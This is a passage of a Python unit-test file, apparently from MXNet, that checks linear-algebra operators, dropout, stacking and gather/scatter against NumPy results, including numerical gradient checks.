data2 = mx.symbol.Variable('data2')
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
def check_fw_grad(sym, location, expected):
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
if grad_check == 1:
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
matrix = np.array([[9., 3., -6., 12.],
[3., 26., -7., -11.],
[-6., -7., 9., 7.],
[12., -11., 7., 65.]])
trian = np.array([[3., 0., 0., 0.],
[1., 5., 0., 0.],
[-2., -1., 2., 0.],
[4., -3., 6., 2.]])
pow = np.array([[2., 1., 1., 1.],
[1., 4., 1., 1.],
[1., 1., 8., 1.],
[1., 1., 1., 16.]])
inv = np.array([[8.95/3., 0.05/3., 2.65, -2.5/3.],
[0.05/3., 0.05, 0.05, 0.],
[2.65, 0.05, 2.5, -0.75],
[-2.5/3., 0., -0.75, 0.25]])
ident = np.eye(4)
shape = (4, 4, 1, 1)
ones = mx.nd.ones(shape).asnumpy()
for lower in [True, False]:
upper = not lower
# Tests with trivial 1x1 matrices.
data_in = np.random.uniform(1, 10, shape)
# test potrf
# Note: Have to symmetrize input, for gradient test to work
res_potrf = np.sqrt(data_in)
test_potrf = mx.sym.linalg.potrf(data1, lower=lower)
check_fw_grad(test_potrf, [data_in], [res_potrf])
# test potri
res_potri = np.divide(ones, data_in * data_in)
test_potri = mx.sym.linalg.potri(data1, lower=lower)
check_fw_grad(test_potri, [data_in], [res_potri])
# test trsm
trian_in = data_in * 7.
test_trsm = mx.sym.linalg.trsm(data1, data2, alpha=7., lower=lower)
check_fw_grad(test_trsm, [trian_in, data_in], [ones])
# test trmm
trian_in = np.divide(ones, trian_in)
test_trmm = mx.sym.linalg.trmm(data1, data2, alpha=7., transpose=True,
rightside=True, lower=lower)
check_fw_grad(test_trmm, [trian_in, data_in], [ones])
# test sumlogdiag
res_sumlogdiag = np.reshape(np.log(data_in), (4, 4))
test_sumlogdiag = mx.sym.linalg.sumlogdiag(data1)
check_fw_grad(test_sumlogdiag, [data_in], [res_sumlogdiag])
# more elaborate example of Cholesky factorization
low_trian = trian
if upper:
trian = np.transpose(trian)
# test potrf
test_potrf = mx.sym.linalg.potrf(_make_symm_symbol(data1, ndims=4), lower=lower)
a = rep_3x(matrix, 4, 4)
r = rep_3x(trian, 4, 4)
check_fw_grad(test_potrf, [a], [r])
#test potri
data1_ltri = _make_triangle_symm(
data1, ndims=4, m=4, lower=lower, dtype=dtype)
test_potri = mx.sym.linalg.potri(data1_ltri, lower=lower)
a = rep_3x(trian, 4, 4)
r = rep_3x(inv, 4, 4)
check_fw_grad(test_potri, [a], [r])
# test trsm
test_trsm = mx.sym.linalg.trsm(data1_ltri, data2, alpha=7., transpose=upper, lower=lower)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.transpose(low_trian), 4, 4)
check_fw_grad(test_trsm, [a, b], [r])
test_trsm2 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-2., rightside=True, transpose=lower, lower=lower)
r = rep_3x(-2. * low_trian, 4, 4)
check_fw_grad(test_trsm2, [a, b], [r])
test_trsm3 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=0.5, transpose=lower, lower=lower)
b = rep_3x(np.transpose(low_trian), 4, 4)
r = rep_3x(0.5 * ident, 4, 4)
check_fw_grad(test_trsm3, [a, b], [r])
test_trsm4 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-0.5, rightside=True, transpose=upper, lower=lower)
b = rep_3x(low_trian, 4, 4)
r = rep_3x(-0.5 * ident, 4, 4)
check_fw_grad(test_trsm4, [a, b], [r])
# test trmm
test_trmm = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=7., transpose=True, rightside=True, lower=lower)
a = [a, rep_3x(matrix, 4, 4)]
r = rep_3x(7. * np.dot(matrix, trian.T), 4, 4)
check_fw_grad(test_trmm, a, [r])
test_trmm2 = mx.sym.linalg.trmm(data1_ltri, data2, alpha=-2., lower=lower)
r = rep_3x(-2. * np.dot(trian, matrix), 4, 4)
check_fw_grad(test_trmm2, a, [r])
test_trmm3 = mx.sym.linalg.trmm(data1_ltri, data2, rightside=True, lower=lower)
r = rep_3x(np.dot(matrix, trian), 4, 4)
check_fw_grad(test_trmm3, a, [r])
test_trmm4 = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=1.2, transpose=True, lower=lower)
r = rep_3x(1.2 * np.dot(trian.T, matrix), 4, 4)
check_fw_grad(test_trmm4, a, [r])
# test sumlogdiag
r = np.reshape(np.tile(10. * np.log(np.array([2.])), 3), (3,))
check_fw_grad(test_sumlogdiag, [rep_3x(pow, 4, 4)], [r])
# Tests for operators linalg.syrk, linalg.gelqf
def _gelqf_combined_symbol(a):
q, l = mx.sym.linalg.gelqf(a)
q_qt = mx.sym.linalg.syrk(q, transpose=False, alpha=1., name='Q_times_Qt')
l_q = mx.sym.linalg.trmm(l, q, alpha=1., name='L_times_Q')
return mx.sym.Group([q_qt, l_q])
# NOTE: If we leave the unused output dangling, things break if dtype=np.float64. Namely, the
# backward gradient for the unused output is of dtype np.float32 then.
# ==> Very annoying!
def _gelqf_first_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(l), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(q, bogus_scal)
def _gelqf_second_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(q), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(l, bogus_scal)
def _syevd_combined_symbol(a):
u, lam = mx.sym.linalg.syevd(a)
u_ut = mx.sym.linalg.syrk(u, transpose=False, alpha=1., name='U_times_Ut')
lam_u = mx.sym.broadcast_mul(mx.sym.reshape(lam, shape=(-2, 1)), u)
ut_lam_u = mx.sym.linalg.gemm2(u, lam_u, alpha=1., transpose_a=True,
transpose_b=False, name='Ut_L_U')
return mx.sym.Group([u_ut, ut_lam_u])
def test_laop_2():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
# Tests for linalg.syrk
mnalpha_lst = [(2, 3, 1.), (5, 3, -2.), (1, 6, 5.), (3, 3, 0.5), (4, 1, 10.), (1, 1, 1.)]
for m, n, alpha in mnalpha_lst:
#print('syrk: m={}, n={}, alpha={}'.format(m, n, alpha))
data_in1 = np.random.uniform(1, 10, (m, n))
res_syrk1 = alpha * np.dot(data_in1, data_in1.T)
test_syrk1 = mx.sym.linalg.syrk(data1, transpose=False, alpha=alpha)
check_fw(test_syrk1, [data_in1], [res_syrk1])
if grad_check == 1:
check_grad(test_syrk1, [data_in1])
res_syrk2 = alpha * np.dot(data_in1.T, data_in1)
test_syrk2 = mx.sym.linalg.syrk(data1, transpose=True, alpha=alpha)
check_fw(test_syrk2, [data_in1], [res_syrk2])
if grad_check == 1:
check_grad(test_syrk2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
r1_batch = rep_3x(res_syrk1, m, m)
check_fw(test_syrk1, [a_batch], [r1_batch])
if grad_check == 1:
check_grad(test_syrk1, [a_batch])
r2_batch = rep_3x(res_syrk2, n, n)
check_fw(test_syrk2, [a_batch], [r2_batch])
if grad_check == 1:
check_grad(test_syrk2, [a_batch])
# Tests for linalg.gelqf
# Currently disabled on GPU as they need cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
test_gelqf2 = _gelqf_combined_symbol(data1) # Outputs (dot(Q, Q.T), dot(L, Q))
test_gelqf_q = _gelqf_first_output(data1) # Output Q (L is not dangling)
test_gelqf_l = _gelqf_second_output(data1) # Output L (Q is not dangling)
mn_lst = [(4, 4), (1, 1), (5, 20), (1, 10), (15, 50)]
for m, n in mn_lst:
#print('gelqf: m={}, n={}'.format(m, n))
data_in1 = np.random.normal(0., 10., (m, n))
res_eye = np.eye(m)
res_a = data_in1
check_fw(test_gelqf2, [data_in1], [res_eye, res_a])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [data_in1])
# A => L
check_grad(test_gelqf_l, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
reye_batch = rep_3x(res_eye, m, m)
ra_batch = a_batch
check_fw(test_gelqf2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [a_batch])
# A => L
check_grad(test_gelqf_l, [a_batch])
# Tests for operator linalg.syevd
def _syevd_first_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(lam), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(u, bogus_scal)
def _syevd_second_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(u), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(lam, bogus_scal)
def _syevd_forward(a):
lam, ut = np.linalg.eig(a)
ind = np.argsort(lam)
lam = lam[ind]
u = ut[:, ind].T
for i in range(0, a.shape[0]):
_syevd_forw_eigvec_sign(u[i])
return u, lam
def _syevd_forw_eigvec_sign(v):
ind = np.argmax(np.abs(v))
if v[ind] < 0.:
v[:] = -v
def _syevd_backward(grad_u, grad_l, u, l):
n = l.size
assert grad_l.size == n
assert grad_u.shape == (n, n)
assert u.shape == (n, n)
temp = np.dot(grad_u, u.T)
temp2 = np.diag(grad_l)
for i in range(1, n):
for j in range(0, i):
denom = 2. * (l[i] - l[j])
elem = (temp[i, j] - temp[j, i])/denom
temp2[i, j] = elem
temp2[j, i] = elem
temp3 = np.dot(u.T, temp2)
return np.dot(temp3, u)
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(1896893923)
def test_laop_3():
# Currently disabled on GPU as syevd needs cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
dtype = np.float64
rtol_fw = 1e-6
atol_fw = 1e-6
num_eps = 1e-4
rtol_bw = 1e-2
atol_bw = 1e-2
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol_fw, atol=atol_fw, dtype=dtype)
# Tests for linalg.syevd
test_syevd2 = _syevd_combined_symbol(data1) # Outputs (U U^T, U^T (diag L) U)
data1_s2 = _make_symm_symbol(data1, ndims=2)
test_syevd_u_2 = _syevd_first_output(data1_s2)
test_syevd_l_2 = _syevd_second_output(data1_s2)
data1_s4 = _make_symm_symbol(data1, ndims=4)
test_syevd_u_4 = _syevd_first_output(data1_s4)
test_syevd_l_4 = _syevd_second_output(data1_s4)
n_lst = [4, 1, 2, 10, 14]
for n in n_lst:
#print('\n** syevd: n={}'.format(n))
data_in1 = np.random.normal(0., 10., (n, n))
data_in1 = 0.5 * (data_in1 + data_in1.T)
res_eye = np.eye(n)
res_a = data_in1
check_fw(test_syevd2, [data_in1], [res_eye, res_a])
# Check backward
grad_u = np.random.normal(0., 2., (n, n))
grad_l = np.random.normal(0., 2., (n,))
bw_u, bw_l = _syevd_forward(data_in1)
grad_a = _syevd_backward(grad_u, grad_l, bw_u, bw_l)
check_bw(mx.sym.linalg.syevd(data1), [data_in1], [grad_u, grad_l], [grad_a])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_2, [data_in1])
# A => L
check_grad(test_syevd_l_2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, n, n)
reye_batch = rep_3x(res_eye, n, n)
ra_batch = a_batch
check_fw(test_syevd2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_4, [a_batch])
# A => L
check_grad(test_syevd_l_4, [a_batch])
# @piyushghai - Removing the fixed seed for this test.
# Issue for flakiness is tracked at - https://github.com/apache/incubator-mxnet/issues/11721
def test_laop_4():
# Currently disabled on GPU as syevd needs cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
rtol_fw = 1e-6
atol_fw = 1e-6
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected, dtype :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
a_np = np.array([[1., 2.], [2., 4.]])
u_np = np.array([[0.89442718, -0.44721359], [0.44721359, 0.89442718]])
l_np = np.array([0., 5.])
test_syevd = mx.sym.linalg.syevd(data1)
# float64
#print('float64')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float64)
# float32
#print('float32')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float32)
def test_laop_5():
# tests for diagonal and triangular matrix extraction and generation
data = mx.symbol.Variable('data')
# test complete range of small matrices to cover corner cases
for n in range(1, 5):
# test batched and non-batched processing
for b in range(3):
shape = (n, n) if b == 0 else (b, n, n)
data_in = np.random.uniform(1, 10, shape)
# test all legal offsets of the diagonal
for offs in range(1-n, n):
# test extraction of diagonal
test_diag = mx.sym.linalg.extractdiag(data, offset=offs)
res_diag = np.diagonal(data_in, offset=offs) if b==0 else np.diagonal(data_in, axis1=1, axis2=2, offset=offs)
check_symbolic_forward(test_diag, [data_in], [res_diag])
check_numeric_gradient(test_diag, [data_in])
# test generation of diagonal matrix
test_diag2 = mx.sym.linalg.makediag(data, offset=offs)
res_diag2 = None
if b == 0:
res_diag2 = np.diagflat(res_diag, k=offs)
else:
for i in range(b):
res = np.reshape(np.diagflat(res_diag[i], k=offs), (1, n, n))
res_diag2 = res if res_diag2 is None else np.concatenate((res_diag2, res), axis=0)
check_symbolic_forward(test_diag2, [res_diag], [res_diag2])
check_numeric_gradient(test_diag2, [res_diag])
# check both settings for parameter "lower" in case of zero offset
lower_vals = [True] if offs != 0 else [True, False]
for lower in lower_vals:
# test extraction of triangle by doing a full roundtrip as the intermediate extracted
# triangle has different orderings than numpy.
test_trian = mx.sym.linalg.extracttrian(data, offset=offs, lower=lower)
test_trian = mx.sym.linalg.maketrian(test_trian, offset=offs, lower=lower)
extracts_lower = (offs < 0) or ((offs == 0) and lower)
res_trian = None
if b == 0:
res_trian = np.tril(data_in, offs) if extracts_lower else np.triu(data_in, offs)
else:
for i in range(b):
res = np.tril(data_in[i], offs) if extracts_lower else np.triu(data_in[i], offs)
res = np.reshape(res, (1, n, n))
res_trian = res if res_trian is None else np.concatenate((res_trian, res), axis=0)
check_symbolic_forward(test_trian, [data_in], [res_trian])
check_numeric_gradient(test_trian, [data_in])
# Tests for linalg.inverse
@pytest.mark.skip(reason="Test crashes https://github.com/apache/incubator-mxnet/issues/15975")
def test_laop_6():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-4
atol_bw = 1e-6
data = mx.symbol.Variable('data')
check_fw = lambda sym, location, expected:\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
## det(I + dot(v, v.T)) = 1 + dot(v.T, v) >= 1, so it's always invertible;
## det is away from zero, so the value of logdet is stable
v = np.random.random(4)
a = np.eye(4) + np.outer(v, v)
a = np.tile(a, (3, 1, 1))
permute_mat = np.eye(4)[[1, 0, 2, 3]]
# test matrix inverse
r = np.eye(4)
r = np.tile(r, (3, 1, 1))
test_inverse = mx.sym.linalg.inverse(data)
test_eye = mx.sym.linalg.gemm2(data, test_inverse)
check_fw(test_eye, [a], [r])
check_grad(test_inverse, [a])
# test matrix determinant
# det
r = np.linalg.det(a)
test_det = mx.sym.linalg.det(data)
check_fw(test_det, [a], [r])
check_grad(test_det, [a])
# test slogdet
r1 = np.array([1., 1., 1.])
r2 = np.log(np.abs(np.linalg.det(a)))
test_sign, test_logabsdet = mx.sym.linalg.slogdet(data)
check_fw(test_sign, [a], [r1])
check_fw(test_sign, [np.dot(a, permute_mat)], [-r1])
check_fw(test_logabsdet, [a], [r2])
check_grad(test_logabsdet, [a])
def test_stack():
for _ in range(100):
ndim = random.randint(1, 5)
axis = random.randint(0, ndim)
if random.randint(0, 1):
axis = axis - ndim - 1
nin = random.randint(1, 3)
dshape = [random.randint(1, 5) for _ in range(ndim)]
inputs = [np.random.uniform(size=dshape) for _ in range(nin)]
output = np.stack(inputs, axis=axis)
sym_ins = [mx.sym.var('x%d'%i) for i in range(nin)]
out = mx.sym.stack(*sym_ins, axis=axis)
check_symbolic_forward(out, inputs, [output])
check_numeric_gradient(out, inputs)
@pytest.mark.flaky
def test_dropout():
def zero_count(array, ratio):
zeros = 0
for i in array:
if i == 0:
zeros += 1
elif math.isnan(i):
assert ratio == 1 # Only valid for ratio = 1
zeros += 1
return zeros
def check_correctness(executor, input, ratio):
input = input.ravel()
output = executor.outputs[0].asnumpy().ravel()
input_sum = np.sum(input)
output_sum = np.sum(output)
# Make sure input zeroes are none (test data setup check)
assert zero_count(input, ratio) == 0
# count number of zeroes in output
output_zeroes = zero_count(output, ratio)
# Hopefully should be within ratio/2 %
error = abs(output_sum - input_sum) / input_sum
if ratio == 1.0:
assert output_zeroes == len(input)
elif ratio > 0.2:
assert output_zeroes > 0
assert error < (ratio/2)
elif ratio == 0:
assert output_zeroes == 0
def check_dropout_ratio(ratio, shape, cudnn_off=True):
# test dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, cudnn_off=cudnn_off)
exe = y._simple_bind(ctx=default_context(), data=shape)
if ratio == 1:
max_value = float('nan')
else:
max_value = 1 if ratio == 0 else 1/ratio
if ratio == 1:
min_value = float('nan')
else:
min_value = 1 if ratio == 0 else 0
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
if not math.isnan(max_value):
assert exe.outputs[0].asnumpy().max() > 0
else:
assert math.isnan(exe.outputs[0].asnumpy().max())
if not math.isnan(min_value):
assert exe.outputs[0].asnumpy().min() == min_value
else:
assert math.isnan(exe.outputs[0].asnumpy().min())
check_correctness(exe, exe.arg_arrays[0].asnumpy(), ratio)
if ratio == 0.5:
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert (exe.outputs[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
# test permanent dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, mode='always', cudnn_off=cudnn_off)
exe = y._simple_bind(ctx=default_context(), data=shape)
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
def get_slice(x, axis, idx):
ix = ()
for i in range(x.ndim):
if i == axis:
ix += (idx,)
else:
ix += (slice(None, None, None),)
return x[ix]
def check_dropout_axes(ratio, shape, axes, cudnn_off=True):
compactshape = list(shape)
for axis in axes:
compactshape[axis] = 1
compactx = mx.random.uniform(shape=tuple(compactshape))
broadcastx = compactx.broadcast_to(shape)
dropouty = mx.nd.Dropout(broadcastx, p=ratio, axes=axes, cudnn_off=cudnn_off)
for axis in axes:
target = get_slice(dropouty, axis, 0).asnumpy()
for i in range(1, shape[axis]):
assert(get_slice(dropouty, axis, i).asnumpy() == target).all()
def check_passthrough(ratio, shape, cudnn_off=True):
# test inference_mode forward and then backward
a = mx.random.uniform(shape=shape)
a.attach_grad()
with mx.autograd.record(train_mode=False):
b = mx.nd.Dropout(a, ratio, cudnn_off=cudnn_off) # dropout acts as identity
b.backward()
assert_almost_equal(a.grad.asnumpy(), mx.nd.ones_like(b).asnumpy())
shape = (100, 100)
check_dropout_ratio(0.5, shape)
check_dropout_ratio(0.0, shape)
check_dropout_ratio(1.0, shape)
check_dropout_ratio(0.75, shape)
check_dropout_ratio(0.25, shape)
check_dropout_ratio(0.5, shape, cudnn_off=False)
check_dropout_ratio(0.0, shape, cudnn_off=False)
check_dropout_ratio(1.0, shape, cudnn_off=False)
check_dropout_ratio(0.75, shape, cudnn_off=False)
check_dropout_ratio(0.25, shape, cudnn_off=False)
check_passthrough(0.5, shape)
check_passthrough(0.0, shape)
check_passthrough(1.0, shape)
check_passthrough(0.5, shape, cudnn_off=False)
check_passthrough(0.0, shape, cudnn_off=False)
check_passthrough(1.0, shape, cudnn_off=False)
nshape = (10, 10, 10, 10)
with mx.autograd.train_mode():
check_dropout_axes(0.25, nshape, axes = (0,))
check_dropout_axes(0.25, nshape, axes = (1,))
check_dropout_axes(0.25, nshape, axes = (2,))
check_dropout_axes(0.25, nshape, axes = (3,))
check_dropout_axes(0.25, nshape, axes = (0, 1))
check_dropout_axes(0.25, nshape, axes = (0, 2))
check_dropout_axes(0.25, nshape, axes = (0, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2))
check_dropout_axes(0.25, nshape, axes = (1, 3))
check_dropout_axes(0.25, nshape, axes = (2, 3))
check_dropout_axes(0.25, nshape, axes = (0, 1, 2))
check_dropout_axes(0.25, nshape, axes = (0, 2, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2, 3))
check_dropout_axes(0.25, nshape, axes = (0,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (3,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2, 3), cudnn_off=False)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/11290")
def test_scatter_gather_nd():
def check(data, idx):
data.attach_grad()
with mx.autograd.record():
y = mx.nd.gather_nd(data, idx)
y.backward(y)
npidx = tuple(i.asnumpy() for i in idx)
assert (data.asnumpy()[npidx] == y.asnumpy()).all()
npdata = np.zeros_like(data.asnumpy())
npdata[npidx] = y.asnumpy()
assert (npdata == data.grad.asnumpy()).all()
assert (mx.nd._internal._backward_gather_nd(y, idx, shape=data.shape).asnumpy() == data.grad.asnumpy()).all()
for dtype in ['int32', 'int64', 'float16', 'float32', 'float64']:
data = mx.nd.arange(360, dtype=dtype).reshape((3,4,5,6))
idx = mx.nd.array([[1,1,2], [3, 3, 0], [3,2,1]], dtype='int32')
check(data, idx)
idx = mx.nd.array([[1,1,2], [3,3,0], [3,2,1], [5,2,4]], dtype='int32')
check(data, idx)
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [0, 1, 0]], dtype='int32')
assert (mx.nd.scatter_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [2, 3]]).all()
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [1, 1, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [0, 5]]).all()
data_npy = np.random.randint(0, 10, (100,))
data = mx.nd.array(data_npy, dtype=dtype)
idx = mx.nd.zeros(shape=(1, 100), dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data_npy.sum())
if dtype == 'int64':
data = mx.nd.array([2123162361283621, -31231236374787,
-112372937128970, -1378278798172378], dtype=dtype)
idx = mx.nd.array([[0, 0, 0, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data.asnumpy().sum())
def test_gather_nd_check_bound():
def _test_gather_nd_exception(data, indices):
output = mx.nd.gather_nd(data, indices).asnumpy()
# check if indices is out of bound
data = mx.nd.array([[0, 1, 2], [3, 4, 5]])
indices1 = mx.nd.array([[0, 1, 0], [0, 1, 3]])
indices2 = mx.nd.array([[0, 1, 0], [0, 1, -5]])
assertRaises(IndexError, _test_gather_nd_exception, data, indices1)
# IndexError: index 3 is out of bounds for axis 1 with size 3
assertRaises(IndexError, _test_gather_nd_exception, data, indices2)
# IndexError: index -5 is out of bounds for axis 1 with size 3
# check if the negative indices are wrapped correctly
indices1 = mx.nd.array([[0, 1, -1], [0, 1, -2]])
indices2 = mx.nd.array([[0, 1, 1], [0, 1, 1]])
data1 = mx.nd.gather_nd(data, indices1)
data2 = mx.nd.gather_nd(data, indices2)
assert_almost_equal(data1, data2, rtol=1e-5, atol=1e-5)
def compare_forw_backw_unary_op(
name, forward_mxnet_call, forward_numpy_call,
backward_numpy_call, shape, input_low, input_high, rtol, atol,
dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
data = mx.symbol.Variable(op_name + '_data', dtype=dtype)
# Comparison: Forward expression
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
res_np = forward_numpy_call(data_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_fw(op_ex, [data_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data_grad = backward_numpy_call(data_np) * res_grad
check_bw(op_ex, [data_np], [res_grad], [data_grad])
def finite_diff_unary_op(
name, forward_mxnet_call, shape, input_low, input_high, rtol, atol,
num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
data = mx.symbol.Variable('data', dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_grad(op_ex, [data_np])
def np_smooth_l1(x, sigma):
issq = 1. / sigma / sigma
absx = np.abs(x)
temp = x * sigma
return np.where(absx < issq, 0.5 * (temp ** 2), absx - 0.5 * issq)
def np_smooth_l1_grad(x, sigma):
ssq = sigma * sigma
return np.where(np.abs(x) < 1. / ssq, x * ssq, np.sign(x))
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(192837465)
def test_unary_math_operators():
have_scipy = True
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
have_scipy = False
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
rtol_less_l = [1e-6, 1e-5, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
atol_less_l = [1e-6, 1e-5, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'arccos' : [lambda x: mx.sym.arccos(x),
lambda x: np.arccos(x),
lambda x: -1. / np.sqrt(1. - x ** 2.),
-0.95, 0.95],
'arccosh': [lambda x: mx.sym.arccosh(x),
lambda x: np.arccosh(x),
lambda x: 1. / np.sqrt(x ** 2 - 1.),
1.05, 10.0],
'arcsin': [lambda x: mx.sym.arcsin(x),
lambda x: np.arcsin(x),
lambda x: 1. / np.sqrt(1. - x ** 2),
-0.95, 0.95],
'arcsinh': [lambda x: mx.sym.arcsinh(x),
lambda x: np.arcsinh(x),
lambda x: 1. / np.sqrt(x**2 + 1.),
-5.0, 5.0],
'arctan': [lambda x: mx.sym.arctan(x),
lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.),
-5.0, 5.0],
'arctanh': [lambda x: mx.sym.arctanh(x),
lambda x: np.arctanh(x),
